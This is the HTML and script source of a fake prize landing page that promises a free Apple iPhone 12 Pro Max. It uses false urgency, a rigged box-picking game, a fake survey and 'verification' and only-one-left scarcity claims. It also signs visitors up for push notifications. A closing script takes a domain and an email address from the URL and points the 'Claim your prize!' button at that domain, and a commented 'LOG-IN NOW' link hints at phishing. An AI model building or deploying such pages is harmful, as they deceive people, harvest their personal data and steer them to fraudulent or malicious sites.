<!doctype html>
<html lang="en" dir="ltr">
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
  
    <title>Prize Alert!</title>
    <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="lander" content="survey-pick-a-box">
<meta name="description" content="survey-pick-a-box">
<link rel="shortcut icon" href="data:image/x-icon" type="image/x-icon"> 
    <link href="css/app7329.css?id=c588c17324f2be0e0ec9" type="text/css" rel="stylesheet"/>
    <link href="css/landers/survey-pick-a-box/appbbad.css?id=8ff1f75cafacc8de6329" type="text/css" rel="stylesheet" />
      </head>
  <body>

<link rel="manifest" href="/manifest.json"/>
<script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async=""></script>
<script>
    var OneSignal = window.OneSignal || [];
    OneSignal.push(function () {
        OneSignal.init({
            appId: "8e83c003-a024-402d-8f70-12b25c6394c3",
        });
    });
</script>
    
    <div class="app" id="app" v-cloak>
      <vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
        <img
          class="opening-modal__image"
          src="img/prizes/iphone-12-pro-max/default%400.75x.png"
          alt="Apple iPhone 12 Pro Max"
        />

        <h1 class="heading heading--h1">
          You have been selected to win a Apple iPhone 12 Pro Max!
        </h1>
        <p class="paragraph">
          On the occasion of our anniversary we will randomly select 10 users so they can get a Apple iPhone 12 Pro Max for FREE.
        </p>
        <p class="paragraph">
          But hurry up! This offer is only available for a limited time!
        </p>
        <button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
          OK
        </button>
      </vue-modal>
      <vue-modal :open="showInstructionsModal">
        <h1 class="heading heading--h1">Play to win!</h1>
        <p class="paragraph">
          Now you have the chance to win this fantastic Apple iPhone 12 Pro Max.
        </p>
        <button class="button" v-on:click="showInstructionsModal = false">
          Try your luck!
        </button>
      </vue-modal>
      <vue-modal :open="showFailModal">
        <h1 class="heading heading--h1">Better luck next time!</h1>
        <p class="paragraph">
          You have (2) extra chances.
        </p>
        <button class="button" v-on:click="showFailModal = false">
          OK
        </button>
      </vue-modal>
      <vue-modal :open="showSuccessModal">
        <h1 class="heading heading--h1">You&#039;ve won it!</h1>
        <p class="paragraph">
          You won the Apple iPhone 12 Pro Max! Follow the instructions and you will be one step closer to get your Apple iPhone 12 Pro Max!
        </p>
        <a href="#" class="button go-final vv" v-on:click="showInstructionsModal">
          Claim your prize!
        </a>
       
      </vue-modal>

      <div class="left">
        <div class="product-preview">
          <div class="product-preview__title">
            Get it for free!
          </div>
          <img
            class="product-preview__image"
            src="img/prizes/iphone-12-pro-max/default%400.75x.png"
            alt="Apple iPhone 12 Pro Max" 
          />
        </div>
      </div>
      <div class="right">
        <vue-box-picker
          v-if="showBoxPicker"
          :vertical-items="4"
          lid-image="img/landers/survey-pick-a-box/lid.png"
          box-image="img/landers/survey-pick-a-box/box.png"
          box-back-image="img/landers/survey-pick-a-box/box-back.png"
          prize-image="img/prizes/iphone-12-pro-max/default@0.75x.png"
          v-on:fail="onBoxPickerFail"
          v-on:success="onBoxPickerSuccess"
          :horizontal-items="3"
          :max-clicks="2"
        ></vue-box-picker>
        <div class="verify" v-if="showRotator">
          <vue-text-rotator
            v-on:rotate="rotate"
            v-on:finished="onRotatorFinished"
            :strings='[
              "Verifying answers",
              "Verifying answers",
              "Verifying answers"
            ]'
          >
          </vue-text-rotator>
          <div class="verify__text" v-if="rotateIndex > 1">
            <img
              class="verify__icon verify__icon--checked"
              src="img/landers/survey-pick-a-box/checked.png"
              alt=""
            />
            <strong>
              You answered 3/3 questions
            </strong>
          </div>
          <div class="verify__text" v-else>
            <img
              class="verify__icon verify__icon--spinner"
              :class="{'verify__icon--visible' : rotateIndex > 0}"
              src="img/landers/survey-pick-a-box/spinner.gif"
              alt=""
            />
            Checking if all questions are answered.
          </div>
          <div class="verify__text" v-if="rotateIndex > 2">
            <img
              class="verify__icon verify__icon--checked"
              src="img/landers/survey-pick-a-box/checked.png"
              alt=""
            />
            <strong>
              There are still gifts available!
            </strong>
          </div>
          <div class="verify__text" v-else>
            <img
              class="verify__icon verify__icon--spinner"
              :class="{'verify__icon--visible' : rotateIndex > 1}"
              src="img/landers/survey-pick-a-box/spinner.gif"
              alt=""
            />
            Looking for gifts.
          </div>
          <div class="verify__text" v-if="rotateIndex > 3">
            <img
              class="verify__icon verify__icon--checked"
              src="img/landers/survey-pick-a-box/checked.png"
              alt=""
            />
            <strong>
              There is only one Apple iPhone 12 Pro Max available!
            </strong>
          </div>
          <div class="verify__text" v-else>
            <img
              class="verify__icon verify__icon--spinner"
              :class="{'verify__icon--visible' : rotateIndex > 2 }"
              src="img/landers/survey-pick-a-box/spinner.gif"
              alt=""
            />
            Checking stock supply.
          </div>
        </div>
        <vue-survey
          v-if="showSurvey"
          :show-steps="true"
          :questions='[
            {
              title: "Are you a man or a woman?",
              answers: [ { text: "Man" }, { text: "Woman" } ]
            },
            {
              title: "How old are you?",
              answers: [ { text: "18-29" }, { text: "30-39" }, { text: "40-49" }, { text: "50+" } ]
            },
            {
              title: "How many people live at your place?",
              answers: [ { text: "1" }, { text: "2" }, { text: "3" }, { text: "4+" } ]
            },
          ]'
          v-on:finish="onSurveyFinish"
        ></vue-survey>
      </div>
    </div>
    <script>window.view = window.view || {};view.offerUrl = "index5e18.html\/\/www.notethis.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script>    <script src="js/app5697.js?id=70153298ff6fb62a5a50" type="application/javascript"></script>
        <script src="js/landers/survey-pick-a-box/app93de.js?id=7d524e021ace7aa883d7" type="application/javascript"></script>


        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>




<script>
    function getURLParameter(name) {
        return decodeURI(
            (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || '');
    }

    // Grab dom URL variable
    var dom = getURLParameter('dom');
    var email = getURLParameter('email');
    var emaildec = decodeURI(email);
    var realemail = email.replace("%40", "@");

    //build link - insert into HTML
    // document.write('<a href="'+ link + '" class="**button classes here**" style="display: inline-block;">LOG-IN NOW</a>');
    var link = "https://" + dom + "/click/1";


    jQuery(document).ready(function (e) {
        $('.go-final').attr('href', link);
    });
</script>
<script type="text/javascript">
</script>
  </body>

</html>
